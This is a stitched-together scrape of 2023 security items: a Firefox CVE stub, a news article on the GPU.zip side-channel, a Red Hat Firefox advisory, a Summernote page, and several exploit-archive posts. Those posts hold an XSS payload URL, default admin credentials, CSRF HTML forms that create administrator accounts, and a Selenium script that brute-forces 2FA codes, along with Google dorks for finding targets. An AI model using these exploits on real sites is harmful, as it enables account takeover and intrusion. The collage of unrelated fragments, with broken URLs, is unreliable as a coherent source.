A compromised content process could have provided malicious data to `FilterNodeD2D1` resulting in an out-of-bounds write, leading to a potentially exploitable crash in a privileged process. This vulnerability affects Firefox < 118, Firefox ESR < 115.3, and Thunderbird < 115.3.

Sorry, I can't find "_1846683?cve=title_". It does not seem like bug number nor an alias to a bug.

Please press **Back** and try again.

CVE-2023-5168: Invalid Bug ID

A novel side-channel attack called GPU.zip renders virtually all modern graphics processing units (GPU) vulnerable to information leakage.
"This channel exploits an optimization that is data dependent, software transparent, and present in nearly all modern GPUs: graphical data compression," a group of academics from the University of Texas at Austin, Carnegie Mellon University, University of

Vulnerability / Endpoint Security

A novel side-channel attack called **GPU.zip** renders virtually all modern graphics processing units (GPU) vulnerable to information leakage.

"This channel exploits an optimization that is data dependent, software transparent, and present in nearly all modern GPUs: graphical data compression," a group of academics from the University of Texas at Austin, Carnegie Mellon University, University of Washington, and the University of Illinois Urbana-Champaign said.

Graphical data compression is a feature in integrated GPUs (iGPUs) that allows for saving memory bandwidth and improving performance when rendering frames, compressing visual data losslessly even when it's not requested by software.

The study found that the compression, which happens in various vendor-specific and undocumented ways, induces data-dependent DRAM traffic and cache occupancy that can be measured using a side-channel.

"An attacker can exploit the iGPU-based compression channel to perform cross-origin pixel stealing attacks in the browser using SVG filters, even though SVG filters are implemented as constant time," the researchers said.

"The reason is that the attacker can create highly redundant or highly non-redundant patterns depending on a single secret pixel in the browser. As these patterns are processed by the iGPU, their varying degrees of redundancy cause the lossless compression output to depend on the secret pixel."

Successful exploitation could allow a malicious web page to infer the values of individual pixels from another web page embedded in an iframe element in the latest version of Google Chrome, effectively circumventing critical security boundaries such as same-origin policy (SOP).

Chrome and Microsoft Edge are particularly vulnerable to the attack because they allow cross-origin iframes to be loaded with cookies, permit rendering SVG filters on iframes, and delegate rendering tasks to the GPU. However, Mozilla Firefox and Apple Safari are not impacted.

In other words, the GPU graphical data compression leakage channel can be used to steal pixels from a cross-origin iframe by "either measuring the rendering time difference due to memory bus contention or by using the LLC walk time metric to infer the GPU-induced CPU cache state changes."

A proof-of-concept (PoC) devised by the researchers discovered that it's possible for a threat actor could trick a potential target into visiting a rogue website and learn information about a logged-in user's Wikipedia username.

UPCOMING WEBINAR

Fight AI with AI — Battling Cyber Threats with Next-Gen AI Tools

Ready to tackle new AI-driven cybersecurity challenges? Join our insightful webinar with Zscaler to address the growing threat of generative AI in cybersecurity.

Supercharge Your Skills

This, in turn, is rooted in the fact that some web standards allow for the framing page to apply visual effects (i.e., SVG filters) to the iframed page, thereby exposing the mechanism to side-channel attacks by, say, computing the time differences between rendering black and white pixels and then distinguish between them using the timing information.

Affected GPUs include those from AMD, Apple, Arm, Intel, Nvidia, and Qualcomm. That said, websites that already deny being embedded by cross-origin websites via X-Frame-Options and Content Security Policy (CSP) rules are not susceptible to the pixel-stealing attack.

The findings come on the back of a related side-channel attack called Hot Pixels that leverages a similar approach to conduct "browser-based pixel stealing and history sniffing attacks" against Chrome and Safari web browsers.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Researchers Uncover New GPU Side-Channel Vulnerability Leaking Sensitive Data

LogoBee CMS version 0.2 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : LogoBee CMS v0.2 XSS Vulnerability                                                                                 || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : https://logobee.com                                                                                                |  | # Dork      : intext:''Logo & Web Design by LogoBee''                                                                            |====================================================================================================================================poc :[+]  Dorking İn Google Or Other Search Enggine .[+]  use payload : /updates.php?id=<marquee><font color=lime size=32>Hacked by indoushka</font></marquee>[+]  http://vaxform127.0.0.1/updates.php?id=%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20indoushka%3C/font%3E%3C/marquee%3EGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

LogoBee CMS 0.2 Cross Site Scripting

Lamano LMS version 0.1 suffers from an ignored default credential vulnerability.

    ====================================================================================================================================| # Title     : Lamano LMS v0.1 Insecure Settings Vulnerability                                                                    || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)                                               | | # Vendor    : http://www.lamano.lu/                                                                                              |  | # Dork      :  © 2018 Lamano by easysolutions                                                                                    |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] Use payload : user = admin & Pass : 1234[+] https://www.sylviebecker127.0.0.1luGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Lamano LMS 0.1 Insecure Settings

Luxcal Event Calendar version 3.2.3 suffers from a cross site request forgery vulnerability.

====================================================================================================================================  
| # Title     : Luxcal Event Calendar v3.2.3 CSRF Vulnerability                                                                    |  
| # Author    : indoushka                                                                                                          |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            |  
| # Vendor    : https://www.LuxSoft.eu                                                                                             |  
| # Dork      : powered by LuxSoft                                                                                                 |  
====================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following html code create a new admin .

[+] Go to the line 2.

[+] Set the target site link Save changes and apply . 

[+] infected file : index.php

[+] http://127.0.0.1/q7.3/index.php.

[+] save code as poc.html .

<html>  
<form method="POST" name="form0" action="http://127.0.0.1/lux/index.php?lc&editUser=y&uid=add">  
<input type="hidden" name="uname" value="tcyber"/>  
<input type="hidden" name="email" value="g4k@hot.mail"/>  
<input type="hidden" name="new_pw" value="123456"/>  
<input type="hidden" name="userRights" value="9"/>  
<input type='submit' name='addExe' value="Add Profile">  
</form>  
</html>

Greetings to :=========================================================================================================================  
jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |  
=======================================================================================================================================

Luxcal Event Calendar 3.2.3 Cross Site Request Forgery

Lamano CMS version 2.0 suffers from a cross site request forgery vulnerability.

====================================================================================================================================  
| # Title     : Lamano CMS v2.0 CSRF Vulnerability                                                                                 |  
| # Author    : indoushka                                                                                                          |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)                                               |   
| # Vendor    : http://www.lamano.lu/                                                                                              |    
| # Dork      :  © 2018 Lamano by easysolutions                                                                                    |  
====================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following html code create a new admin .

[+] Go to the line 8.

[+] Set the target site link Save changes and apply . 

[+] infected file : admin.php

[+] http://127.0.0.1/q73/admin.php .

[+] save code as poc.html .

<!DOCTYPE html>  
<html xmlns="http://www.w3.org/1999/xhtml">  
<head profile="http://www.w3.org/2005/10/profile">

</tr>  
                    </table>  
                <br/><br/>  
        <form action="https://www.sylviebecker.127.0.0.1/lu/admin.php?action=add_user" method="POST">  
            <table class="modif_utilisateur" border="0" cellpadding="3" cellspacing="0" width="350">  
                <tr>  
                    <td class="tah11" colspan="2" align="center"><B>Nouvel utilisateur : </B></td>  
                </tr>  
                <tr>  
                    <td class="tah11" align="right">Nom d'utilisateur :</td>  
                    <td class="tah11" align="left"><input type="text" name="user" class="form-control" value=""></td>  
                </tr>  
                <tr>  
                    <td class="tah11" align="right">Mot de passe : </td>  
                    <td class="tah11" align="left"><input type="text" name="pass" class="form-control" value=""></td>  
                </tr>  
                <tr>  
                    <td class="tah11" colspan="2" align="center"><input class="btn btn-lg btn-primary" type="submit" value="Ajouter"></td>  
                </tr>  
            </table>  
        </form><br/><br/>  
<div>

Greetings to :=========================================================================================================================  
jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |  
=======================================================================================================================================

Lamano CMS 2.0 Cross Site Request Forgery

WordPress Theme My Login 2FA plugin versions prior to 1.2 suffer from a brute forcing vulnerability.

    The theme my login plugin before 1.2 does not check how often a 2FA code was wrongly entered, allowing a bruteforce of codes to bypass 2FA effectively. A working python exploit:from typing import KeysViewfrom selenium.webdriver.common.by import Byfrom selenium import webdriverfrom selenium.webdriver.support.ui import WebDriverWait from selenium.webdriver.support import expected_conditions as EC driver = webdriver.Firefox()driver.get("websiteloginhere")# Locate the username field by its 'id' attribute and fill it in username_field = driver.find_element(By.ID, "user_login") username_field.click() username_field.send_keys("usernamehere")  # Locate the password field by its 'id' attribute and fill it in password_field = driver.find_element(By.ID, "user_pass") password_field.click() password_field.send_keys("passwordhere") # Locate the Log In button and click it login_button = driver.find_element(By.XPATH, "//button[@name='submit' and @type='submit' and @class='tml-button']") login_button.click() # FROM HERE, keep doing this from 000000 till 999999 or till you can not find the input anymore after waiting  for i in range(1000000):  code = str(i).zfill(6)   try:  wait = WebDriverWait(driver, 10)  code_field = wait.until(EC.element_to_be_clickable((By.XPATH, "//input[@name='code' and @type='text']")))  except:  break   code_field.click()  code_field.clear()  code_field.send_keys(code)   verify_button = driver.find_element(By.XPATH, "//button[@name='submit' and @type='submit' and @class='tml-button']")  verify_button.click()

WordPress Theme My Login 2FA Brute Force

An XPC misconfiguration vulnerability in CoreCode MacUpdater before 2.3.8, and 3.x before 3.1.2, allows attackers to escalate privileges by crafting malicious .pkg files.

CVE-2023-41902: MacUpdater Version History

An update for firefox is now available for Red Hat Enterprise Linux 9.0 Extended Update Support.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.

Related CVEs:
* CVE-2023-4863: A heap-based buffer flaw was found in the way libwebp, a library used to process "WebP" image format data, processes certain specially formatted WebP images. An attacker could use this flaw to crash or execute remotely arbitrary code  in an application such as a web browser compiled with this library.


Skip to navigation Skip to main content

**Utilities**

*   Subscriptions
*   Downloads
*   Containers
*   Support Cases

**Infrastructure and Management**

*   Red Hat Enterprise Linux
*   Red Hat Satellite
*   Red Hat Subscription Management
*   Red Hat Insights
*   Red Hat Ansible Automation Platform

**Cloud Computing**

*   Red Hat OpenShift
*   Red Hat OpenStack Platform
*   Red Hat OpenShift Container Platform
*   Red Hat OpenShift Data Science
*   Red Hat OpenShift Dedicated
*   Red Hat Advanced Cluster Security for Kubernetes
*   Red Hat Advanced Cluster Management for Kubernetes
*   Red Hat Quay
*   OpenShift Dev Spaces
*   Red Hat OpenShift Service on AWS

**Storage**

*   Red Hat Gluster Storage
*   Red Hat Hyperconverged Infrastructure
*   Red Hat Ceph Storage
*   Red Hat OpenShift Data Foundation

**Runtimes**

*   Red Hat Runtimes
*   Red Hat JBoss Enterprise Application Platform
*   Red Hat Data Grid
*   Red Hat JBoss Web Server
*   Red Hat Single Sign On
*   Red Hat support for Spring Boot
*   Red Hat build of Node.js
*   Red Hat build of Quarkus

**Integration and Automation**

All Products

Issued:

2023-09-18

Updated:

2023-09-18

**RHSA-2023:5205 - Security Advisory**

*   Overview
*   Updated Packages

**Synopsis**

Important: firefox security update

**Type/Severity**

Security Advisory: Important

**Red Hat Insights patch analysis**

Identify and remediate systems affected by this advisory.

View affected systems

**Topic**

An update for firefox is now available for Red Hat Enterprise Linux 9.0 Extended Update Support.  

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

**Description**

Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability.  

This update upgrades Firefox to version 102.15.1 ESR.  

Security Fix(es):  

*   libwebp: Heap buffer overflow in WebP Codec (CVE-2023-4863)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

**Solution**

For details on how to apply this update, which includes the changes described in this advisory, refer to:  

https://access.redhat.com/articles/11258

After installing the update, Firefox must be restarted for the changes to take effect.

**Affected Products**

*   Red Hat Enterprise Linux for x86\_64 - Extended Update Support 9.0 x86\_64
*   Red Hat Enterprise Linux for IBM z Systems - Extended Update Support 9.0 s390x
*   Red Hat Enterprise Linux for Power, little endian - Extended Update Support 9.0 ppc64le
*   Red Hat Enterprise Linux for ARM 64 - Extended Update Support 9.0 aarch64
*   Red Hat Enterprise Linux Server for Power LE - Update Services for SAP Solutions 9.0 ppc64le
*   Red Hat Enterprise Linux for x86\_64 - Update Services for SAP Solutions 9.0 x86\_64
*   Red Hat Enterprise Linux Server for ARM 64 - 4 years of updates 9.0 aarch64
*   Red Hat Enterprise Linux Server for IBM z Systems - 4 years of updates 9.0 s390x

**Fixes**

*   BZ - 2238431 - CVE-2023-4863 libwebp: Heap buffer overflow in WebP Codec

**Red Hat Enterprise Linux for x86\_64 - Extended Update Support 9.0**

SRPM

firefox-102.15.1-1.el9\_0.src.rpm

SHA-256: cdff6558e108f2f1f389ff3c1291189613f5e5a2a92add8b82492e33cfa2fa08

x86\_64

firefox-102.15.1-1.el9\_0.x86\_64.rpm

SHA-256: 43db8e38fe12cd93371c5de80022d1a52afbf71413fd8b3c895354cc38e2458f

firefox-debuginfo-102.15.1-1.el9\_0.x86\_64.rpm

SHA-256: 7db1e32c1dd8da59ffe0fa4bc75ed10daa1fa4a12c79b673c28c6088b36d7c65

firefox-debugsource-102.15.1-1.el9\_0.x86\_64.rpm

SHA-256: 7bcdb298f440a8e3d3bd342214cfed01fb791b8cb187dc24161fab61a0123556

**Red Hat Enterprise Linux for IBM z Systems - Extended Update Support 9.0**

SRPM

firefox-102.15.1-1.el9\_0.src.rpm

SHA-256: cdff6558e108f2f1f389ff3c1291189613f5e5a2a92add8b82492e33cfa2fa08

s390x

firefox-102.15.1-1.el9\_0.s390x.rpm

SHA-256: fb1b6d1e4c99a97f258d90811cba3d1740ea6f37077ebe567e057703cd303e26

firefox-debuginfo-102.15.1-1.el9\_0.s390x.rpm

SHA-256: 21fc84eed2a10219b8e469a91eaea1ea105845d4fbf8ade55c2548990177d5ec

firefox-debugsource-102.15.1-1.el9\_0.s390x.rpm

SHA-256: 7ad7592bfff8a34eafe571f805978960c0ed2b322cf67456441259baf524f4c5

**Red Hat Enterprise Linux for Power, little endian - Extended Update Support 9.0**

SRPM

firefox-102.15.1-1.el9\_0.src.rpm

SHA-256: cdff6558e108f2f1f389ff3c1291189613f5e5a2a92add8b82492e33cfa2fa08

ppc64le

firefox-102.15.1-1.el9\_0.ppc64le.rpm

SHA-256: b52aede7e24580fa77699364f0b3f4f7f9388d62167a1f4f88236ef6af7e0cd9

firefox-debuginfo-102.15.1-1.el9\_0.ppc64le.rpm

SHA-256: 6596290091e16cd0893943e656988d630d8beb560cda2fe2eb77ec8841370272

firefox-debugsource-102.15.1-1.el9\_0.ppc64le.rpm

SHA-256: 0f0de31ddf194dc21cfd5fdfb6510e484ec3a6c90c1b0dcf077f4cf3d1a706ec

**Red Hat Enterprise Linux for ARM 64 - Extended Update Support 9.0**

SRPM

firefox-102.15.1-1.el9\_0.src.rpm

SHA-256: cdff6558e108f2f1f389ff3c1291189613f5e5a2a92add8b82492e33cfa2fa08

aarch64

firefox-102.15.1-1.el9\_0.aarch64.rpm

SHA-256: 690867fb79ed78e779c3d10d22eecf8b247f7337a8a5e4c8daa8257cc983888b

firefox-debuginfo-102.15.1-1.el9\_0.aarch64.rpm

SHA-256: e454655b7d304233010bd29378a80bc892218dbe19952e91fa50a326a65c5600

firefox-debugsource-102.15.1-1.el9\_0.aarch64.rpm

SHA-256: 271f924e3216a1cee2353226f009fbd30205ed1db3bfe9b01d48a80b65ff295f

**Red Hat Enterprise Linux Server for Power LE - Update Services for SAP Solutions 9.0**

SRPM

firefox-102.15.1-1.el9\_0.src.rpm

SHA-256: cdff6558e108f2f1f389ff3c1291189613f5e5a2a92add8b82492e33cfa2fa08

ppc64le

firefox-102.15.1-1.el9\_0.ppc64le.rpm

SHA-256: b52aede7e24580fa77699364f0b3f4f7f9388d62167a1f4f88236ef6af7e0cd9

firefox-debuginfo-102.15.1-1.el9\_0.ppc64le.rpm

SHA-256: 6596290091e16cd0893943e656988d630d8beb560cda2fe2eb77ec8841370272

firefox-debugsource-102.15.1-1.el9\_0.ppc64le.rpm

SHA-256: 0f0de31ddf194dc21cfd5fdfb6510e484ec3a6c90c1b0dcf077f4cf3d1a706ec

**Red Hat Enterprise Linux for x86\_64 - Update Services for SAP Solutions 9.0**

SRPM

firefox-102.15.1-1.el9\_0.src.rpm

SHA-256: cdff6558e108f2f1f389ff3c1291189613f5e5a2a92add8b82492e33cfa2fa08

x86\_64

firefox-102.15.1-1.el9\_0.x86\_64.rpm

SHA-256: 43db8e38fe12cd93371c5de80022d1a52afbf71413fd8b3c895354cc38e2458f

firefox-debuginfo-102.15.1-1.el9\_0.x86\_64.rpm

SHA-256: 7db1e32c1dd8da59ffe0fa4bc75ed10daa1fa4a12c79b673c28c6088b36d7c65

firefox-debugsource-102.15.1-1.el9\_0.x86\_64.rpm

SHA-256: 7bcdb298f440a8e3d3bd342214cfed01fb791b8cb187dc24161fab61a0123556

**Red Hat Enterprise Linux Server for ARM 64 - 4 years of updates 9.0**

SRPM

firefox-102.15.1-1.el9\_0.src.rpm

SHA-256: cdff6558e108f2f1f389ff3c1291189613f5e5a2a92add8b82492e33cfa2fa08

aarch64

firefox-102.15.1-1.el9\_0.aarch64.rpm

SHA-256: 690867fb79ed78e779c3d10d22eecf8b247f7337a8a5e4c8daa8257cc983888b

firefox-debuginfo-102.15.1-1.el9\_0.aarch64.rpm

SHA-256: e454655b7d304233010bd29378a80bc892218dbe19952e91fa50a326a65c5600

firefox-debugsource-102.15.1-1.el9\_0.aarch64.rpm

SHA-256: 271f924e3216a1cee2353226f009fbd30205ed1db3bfe9b01d48a80b65ff295f

**Red Hat Enterprise Linux Server for IBM z Systems - 4 years of updates 9.0**

SRPM

firefox-102.15.1-1.el9\_0.src.rpm

SHA-256: cdff6558e108f2f1f389ff3c1291189613f5e5a2a92add8b82492e33cfa2fa08

s390x

firefox-102.15.1-1.el9\_0.s390x.rpm

SHA-256: fb1b6d1e4c99a97f258d90811cba3d1740ea6f37077ebe567e057703cd303e26

firefox-debuginfo-102.15.1-1.el9\_0.s390x.rpm

SHA-256: 21fc84eed2a10219b8e469a91eaea1ea105845d4fbf8ade55c2548990177d5ec

firefox-debugsource-102.15.1-1.el9\_0.s390x.rpm

SHA-256: 7ad7592bfff8a34eafe571f805978960c0ed2b322cf67456441259baf524f4c5

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/.

RHSA-2023:5205: Red Hat Security Advisory: firefox security update

Cross Site Scripting vulnerability in Summernote Rich Text Editor v.0.8.18 and before allows a remote attacker to execute arbitrary code via a crafted script to the insert link function in the editor component.

**Super Simple WYSIWYG  
Editor on Bootstrap**

hi,  
we are summernote.  
please, write text here!  
super simple WYSIWYG editor on Bootstrap

**Easy to Install**

Simply download and attach your js, css with bootstrap.

**Customization**

Customize by Initializing various options and modules.  

**Examples**

See all useful features of summernote in action.

**Open Source**

Summernote is licensed under MIT and maintained by the community.

**Integration**

Integrate it with any back-end. 3rd parties available in django, rails, angular.

**Features**

*   Supports Bootstrap 3.x.x to 5.x.x
*   Lightweight (js+css: 100Kb)
*   Smart User Interaction
*   Works in all Major Browsers:
    *   Safari, Chrome, Firefox, Opera, Edge and Internet Explorer 9+
*   Works in all Major Operating Systems:
    *   Windows, MacOS, Linux

**Donate**

**Ad**

We're using BrowserStack for testing!

**Much appreciate to all contributors! Together and further...**

Contributors

Tag

#firefox